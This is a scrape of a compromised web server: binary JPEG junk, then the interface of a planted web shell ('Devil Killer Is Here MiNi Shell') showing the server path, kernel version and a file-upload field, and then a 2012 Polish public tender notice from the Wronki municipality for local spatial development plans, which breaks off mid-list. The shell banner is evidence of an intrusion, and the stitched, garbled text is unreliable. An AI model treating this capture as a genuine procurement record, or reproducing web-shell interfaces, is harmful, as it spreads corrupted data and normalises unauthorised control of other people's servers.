JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/152319-N-2012.html

<p class="kh_header"><b>Wronki: Opracowanie miejscowych planów zagospodarowania przestrzennego</b><br>
<b>Numer ogłoszenia: 152319 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wronki reprezentowana przez Burmistrza Miasta i Gminy , ul. Ratuszowa 5, 64-510 Wronki, woj. wielkopolskie, tel. 067 2545300, faks 067 2545328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wronki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie miejscowych planów zagospodarowania przestrzennego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie: 
1.	częściowej zmiany miejscowego planu zagospodarowania przestrzennego dla terenów położonych wokół Jeziora Pożarowskiego w Wartosławiu, Lubowie i Biezdrowie 
(dz. nr 80432/3 o pow. 0,5600 ha);
2.	miejscowego planu zagospodarowania przestrzennego gminy Wronki w obrębie miejscowości Ćmachowo - dz. nr 66/8 (powierzchnia 6,0947 ha);
3.	miejscowego planu zagospodarowania przestrzennego gminy Wronki w obrębie miejscowości Stare Miasto (powierzchnia około 21 ha)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum:
a)	dwie usługi polegające na sporządzeniu obowiązujących miejscowych planów zagospodarowania przestrzennego na zabudowę mieszkaniową jednorodzinną lub mieszkaniowo - usługową;
oraz
b)	trzy usługi polegające na sporządzeniu obowiązujących miejscowych planów zagospodarowania przestrzennego na zabudowę przemysłową;
oraz
c)	jedną usługę polegającą na sporządzeniu obowiązujących miejscowych planów zagospodarowania przestrzennego na zabudowę rekreacyjną.

Poszczególne prace wymienione w lit. a, b i c mogą być wykonane w jednym zamówieniu lub 
w oddzielnych zamówieniach.

W wykazie wykonanych usług należy ponadto wskazać Dziennik Urzędowy, w którym 
te opracowania zostały opublikowane.
Na potwierdzenie faktu, że usługi wymienione/a w wykazie usługi/a (załącznik nr 5 SIWZ) zostały/a wykonane należycie, Wykonawca zobowiązany jest załączyć stosowne dokumenty (np. referencje, listy polecające). 
Ocena spełnienia warunku zostanie dokonana na podstawie wykazu usług złożonego przez Wykonawcę (załącznik nr 5 do SIWZ) wraz z załącznikami.
Wskazane jest aby dokumenty to potwierdzające zawierały co najmniej: 
a.	wskazanie, że Wykonawca realizował lub realizuje usługi, których dokumenty dotyczą,
b.	wskazanie Zamawiającego,
c.	przedmiot / rodzaj wykonanych usług,
d.	wartość wykonanych usług,
e.	opinię stwierdzającą, że usługi zostały wykonane lub są wykonywane należycie lub opinię równoważną,
f.	identyfikację oraz podpis osoby upoważnionej.

Konieczne jest, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców usługi zostały wykonane należycie, zawierały jednoznaczne i nie budzące wątpliwości potwierdzenie należytego wykonania i nie zawierały sprzecznych z wykazem informacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu, jeśli wykaże, 
że dysponuje lub będzie dysponował co najmniej jedną osobą, która posiada uprawnienia urbanistyczne uzyskane zgodnie z ustawą z dnia 07.07.1994 r. o zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 ze zm.) oraz ustawą z dnia 15.12.2000 r. 
o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 ze zm.). Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia złożonego przez Wykonawcę (załącznik nr 4 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ponadto przedkłada:
1)	Formularz ofertowy (sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ).
2)	Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku składania oferty wspólnej lub gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wronki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - Urząd Miasta i Gminy Wronki  ul. Ratuszowa 5, 
64-510 Wronki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2012 godzina 12:00, miejsce: Siedziba Zamawiającego - Urząd Miasta i Gminy Wronki  ul. Ratuszowa 5, 
64-510 Wronki (sekretariat - pokój nr 6, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie częściowej zmiany miejscowego planu zagospodarowania przestrzennego dla terenów położonych wokół Jeziora Pożarowskiego w Wartosławiu, Lubowie                            i Biezdrowie (dz. nr 80432/3 o pow. 0,5600 ha)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia

1.	Opracowanie częściowej zmiany miejscowego planu zagospodarowania przestrzennego dla terenów położonych wokół Jeziora Pożarowskiego w Wartosławiu, Lubowie                            i Biezdrowie (dz. nr 80432/3 o pow. 0,5600 ha). Obszar do opracowania projektu planu określa załączniki do uchwały Nr XIX/166/2012 z dnia 29 maja 2012 r., zgodnie                          z obowiązującymi przepisami w tym zakresie. Skala opracowania 1: 1000.

W zakresie przeznaczenia terenów, studium wskazuje teren potencjalnego rozwoju zabudowy rezydencjonalnej, mieszkaniowej, turystycznej i letniskowej (RTL).

2. Zakres przedmiotu zamówienia obejmuje:
1) przygotowanie wzorów pism, rozdzielników, ogłoszeń oraz wszelkich opracowań i analiz niezbędnych dla potrzeb sporządzenia planu, 
2) analizę wniosków do planu wraz z opracowaniem wykazu oraz propozycji ich rozpatrzenia,
3) uzyskanie niezbędnych podkładów geodezyjnych,
4) opracowanie koncepcji planu,
5) prezentację koncepcji planu na mapie w skali 1:1000 Burmistrzowi Miasta i Gminy Wronki lub podczas konsultacji społecznych wraz z opracowaniem zawierającym inwentaryzację terenowe, tekstowe i graficzne takiej jak:
a) zainwestowania i użytkowania terenu (mapa),
b) stan własności (naniesiony odrębnie na koncepcji oraz projekcie planu - mapa),
c) infrastrukturę techniczną w zakresie koniecznym do ustaleń projektowych na podstawie dostępnych dokumentacji z naniesieniem instalacji projektowych (mapa).
6) opracowanie projektu planu do opiniowania przez Gminną Komisję Urbanistyczno                      - Architektoniczną, Burmistrza Miasta i Gminy Wronki w tym jego prezentacja na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej, 
7) sporządzenie prognozy oddziaływania na środowisko z uwzględnieniem postępowania               w sprawie strategicznej oceny oddziaływania na środowisko, 
8) opracowanie projektu planu z uwzględnieniem uwag Burmistrza Miasta i Gminy Wronki, Gminnej Komisji Urbanistyczno - Architektonicznej i przygotowanie materiałów do dalszego opiniowania i uzgadniania przez organy i instytucje określone w ustawie o planowaniu                       i zagospodarowaniu przestrzennym,
9) sporządzenie wykazu opinii i uzgodnień do projektu miejscowego planu,
10) wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii                           i dokonanych uzgodnień,
11) sporządzenie wniosków w spr. uzyskania zgody Ministra Rolnictwa na przeznaczenie gruntów leśnych na cele nierolnicze i nieleśne,
12) sporządzenie prognozy skutków finansowych uchwalenia planu,
13) obsługę wyłożenia do publicznego wglądu projektu miejscowego planu zagospodarowania przestrzennego wraz z ostateczną prognozą oddziaływania na środowisko,
14) udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami,
15) sporządzenie wykazu uwag - analiza i opracowanie propozycji rozpatrzenia uwag przez Burmistrza, które zostały wniesione w związku z wyłożeniem projektu planu do publicznego wglądu, w razie konieczności składanie wyjaśnień osobą zainteresowanym (pisemnie                       i ustnie),
16) wprowadzenie zmian do projektu planu w związku z rozpatrzeniem i uwzględnieniem uwag, 
17) ponowne uzgadnianie projektu planu w niezbędnym zakresie,
18) wprowadzenie zmian do projektu planu wynikających z ponowionych uzgodnień                         i wyłożeń projektu planu,
19) prezentacja projektu planu Radzie Miasta i Gminy Wronki oraz Burmistrzowi Miasta               i Gminy Wronki wraz z listą nieuwzględnionych uwag, 
20) przygotowanie projektu planu do uchwalenia wraz z uzasadnieniem,
21) przygotowanie pisemnego uzasadnienia i podsumowania do przyjętego dokumentu zgodnie z art. 42 i 55 pkt 3 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227),
22) przygotowanie i skompletowanie dla Wojewody Wielkopolskiego dokumentacji formalno - prawnej oraz planistycznej wraz z uchwałą Rady Miasta i Gminy Wronki w celu sprawdzenia zgodności z prawem i publikacji w Dzienniku Urzędowym Województwa Wielkopolskiego - 2 egz. oryginał i kopia (oprawione w sposób uniemożliwiający dekompletację).

3. Wykonawca winien wykonać przedmiot zamówienia w wersji elektronicznej płyta CD        w formacie uzgodnionym z Zamawiającym oraz w postaci drukowanej w następujących ilościach egzemplarzy:
1) Koncepcja projektu planu wraz z inwentaryzacją - 1 egz. (mapa w skali 1:1000, złożona do formatu A4);
2)Projekt planu do opiniowania przez GKUA wraz z prognozą oddziaływania na środowisko - 1 ezg. (mapa w skali 1:1000, złożona do formatu A4);
3)Projekt planu wraz z prognozą oddziaływania na środowisko do opiniowania i uzgadniania - w ilości odpowiedniej do wymogów ustawy o planowaniu i zagospodarowaniu przestrzennym + 1 egz. (mapy w pomniejszonej skali do formatu A3); 
4)Wniosek leśny wraz ze stosownymi załącznikami w trzech egz.
5)Projekt planu z prognozą oddziaływania na środowisko do wyłożenia -1 egz. (mapa w oryginalnej skali, złożona do formatu A4);
6) Projekt planu z uzasadnieniem do uchwalenia -1 egz. (mapa w oryginalnej skali, złożona do formatu A4);
7) Prognoza skutków finansowych i uchwalenia planu - 2 egz.
8) Uchwalony plan - 9 egz. (7 map w oryginalnej skali, złożonych do formatu A4, 2 egz. map w formacie A3),
9) Po ogłoszeniu w Dzienniku Urzędowym Województwa Wielkopolskiego - 1 egz. mapy                w oryginalnej skali, w formie zabezpieczonej przed zniszczeniem np. laminowanej,                          z przeznaczeniem do wywieszenia na ścianie,
10) Przygotowanie korespondencji, ogłoszeń, obwieszczeń i uchwał tylko w formie elektronicznej.

4. Zapis planu należy wykonać w takiej formie, ażeby dla każdej jednostki elementarnej (najmniejszego obszaru wydzielonego przestrzennie) zawarte były wszystkie ustalenia pozwalające na bezpośredni wydruk jako wypis i wyrys z miejscowego planu zagospodarowania przestrzennego (do dalszych prac projektowych). Ustalenia dla jednostki nie mogą być zawarte w kilku miejscach tego planu. W tekście planu należy używać określeń i terminów stosowanych w istniejącym ustawodawstwie. W każdej sytuacji należy wprowadzić definicję terminu. Używając określonych, stosownych terminów należy przywołać w rozumieniu jakiej podstawy prawnej jest on użyty. Część szczegółowa odnosząca się do jednostki elementarnej musi co najmniej zawierać elementy zawarte            w art. 15 ust.2, ewentualnie ust. 3 ustawy oraz wszelkie inne istotne ustalenia. Cała dokumentacja planistyczna powinna być wykonana w technice cyfrowej(szczegóły techniczne   i programowanie ustalone zostaną na etapie roboczym) umożliwiającej na bieżące korzystanie z opracowania. Tekst planu i rysunek planu należy tak wykonywać, ażeby można było wykonać wydruk dla danej jednostki elementarnej jako wypis i wyrys z planu.

5. Wszystkie mapy i rysunki planu należy wykonać w technice kolorowej.                                Tekst planu powinien być nie w formie opisu, lecz w formie dokumentu prawnego, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 20 czerwca 2002 roku w sprawie zasad techniki prawodawczej (Dz. U. nr 100, poz. 908). Wykonawca zobowiązany jest do przygotowania projektu wszystkich dokumentów formalnoprawnych i na każdym etapie zobowiązany jest do sprawdzenia poprawności przebiegu toku formalno-prawnego, a w przypadku wystąpienia nieprawidłowości zobowiązany jest pisemnie poinformować o tym prowadzącego  opracowanie ze strony urzędu.

6. Wykonawca sporządzi przedmiot zamówienia oraz zapewni we własnym zakresie:
a)	mapy do celów planowania przestrzennego zgodne z warunkami rozporządzenia Ministra Infrastruktury w sprawie wykonywania planów zagospodarowania przestrzennego,
b)	inne mapy topograficzne niezbędne do opracowania prognozy skutków wpływu ustaleń planu na środowisko przyrodnicze,
c)	inne niezbędne materiały do przygotowania projektu miejscowego planu zagospodarowania przestrzennego 
d)	uczestnictwo projektantów w procedurze konsultacji społecznych, wyłożenia projektu  miejscowego planu zagospodarowania przestrzennego oraz procedurze uchwalenia planu przez Radę Miasta i Gminy Wronki.

7. Zamawiający przekaże Wykonawcy zamówienia następujące materiały wyjściowe:
a) informację z ewidencji gruntów,
b) kopie wniosków do planu miejscowego,
c) do wglądu obowiązujący miejscowy plan zagospodarowania przestrzennego,
d) do wglądu Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta    i gminy Wronki. 

8. Wykonanie czynności wynikających z art. 17 pkt 1,2,11 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym oraz koszty z tym związane poniesie Zamawiający.

9. W opracowaniu miejscowego planu zagospodarowania przestrzennego należy stosować wymagania określone Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r.              w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587).

10. Zamawiający będzie uczestniczył w postępowaniu w trakcie opracowywania miejscowego planu zagospodarowania przestrzennego w przesłaniu materiałów opracowanych przez Wykonawcę zgodnie z wymogami przepisów i wskazówek Wykonawcy, ponosząc koszt przesyłek. Za treść merytoryczną i przestrzeganie wymagań formalnych odpowiada Wykonawca. Koszt druku i powielania materiałów ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie miejscowego planu zagospodarowania przestrzennego gminy Wronki w obrębie miejscowości Ćmachowo - dz. nr 66/8 (powierzchnia 6,0947 ha)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia

1.	Opracowanie miejscowego planu zagospodarowania przestrzennego gminy Wronki                               w obrębie miejscowości Ćmachowo - dz. nr 66/8 (powierzchnia 6,0947 ha). Obszar do opracowania projektu planu określa załączniki do uchwały Nr XVI/142/2012 z dnia                 29 lutego 2012 r., zgodnie z obowiązującymi przepisami w tym zakresie. Skala opracowania 1: 1000.

W zakresie przeznaczenia terenów, studium wskazuje tereny rozwoju działalności gospodarczej w tym produkcji i usług (PU)

2. Zakres przedmiotu zamówienia obejmuje:
1) przygotowanie wzorów pism, rozdzielników, ogłoszeń oraz wszelkich opracowań i analiz niezbędnych dla potrzeb sporządzenia planu, 
2) analizę wniosków do planu wraz z opracowaniem wykazu oraz propozycji ich rozpatrzenia,
3) uzyskanie niezbędnych podkładów geodezyjnych,
4) opracowanie koncepcji planu,
5) prezentację koncepcji planu na mapie w skali 1:1000 Burmistrzowi Miasta i Gminy Wronki lub podczas konsultacji społecznych wraz z opracowaniem zawierającym inwentaryzację terenowe, tekstowe i graficzne takiej jak:
a) zainwestowania i użytkowania terenu (mapa),
b) stan własności (naniesiony odrębnie na koncepcji oraz projekcie planu - mapa),
c) infrastrukturę techniczną w zakresie koniecznym do ustaleń projektowych na podstawie dostępnych dokumentacji z naniesieniem instalacji projektowych (mapa).
6) opracowanie projektu planu do opiniowania przez Gminną Komisję Urbanistyczno                      - Architektoniczną, Burmistrza Miasta i Gminy Wronki w tym jego prezentacja na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej, 
7) sporządzenie prognozy oddziaływania na środowisko z uwzględnieniem postępowania               w sprawie strategicznej oceny oddziaływania na środowisko, 
8) opracowanie projektu planu z uwzględnieniem uwag Burmistrza Miasta i Gminy Wronki, Gminnej Komisji Urbanistyczno - Architektonicznej i przygotowanie materiałów do dalszego opiniowania i uzgadniania przez organy i instytucje określone w ustawie o planowaniu                       i zagospodarowaniu przestrzennym,
